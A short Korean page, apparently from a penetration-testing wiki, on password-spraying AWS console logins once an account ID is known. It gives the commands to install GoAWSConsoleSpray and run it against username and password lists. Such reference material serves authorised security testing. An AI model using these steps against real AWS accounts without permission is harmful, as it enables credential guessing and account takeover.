> For the complete documentation index, see [llms.txt](https://www.pentestwiki.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.pentestwiki.com/cloud/aws/password-spraying.md).

# Password Spraying

AWS 계정의 Account Id를 알고있을 때 패스워드 스프레이 공격이 가능합니다.

## Abuse

<pre class="language-bash"><code class="lang-bash"><strong># 패스워드 스프레이 도구 설치
</strong>go install github.com/WhiteOakSecurity/GoAWSConsoleSpray@latest

<strong># 스프레이 공격 (Account Id, username, password 필요)
</strong>GoAWSConsoleSpray -a '&#x3C;account-id>' -u '&#x3C;username-file>' -p '&#x3C;password-file>'
</code></pre>
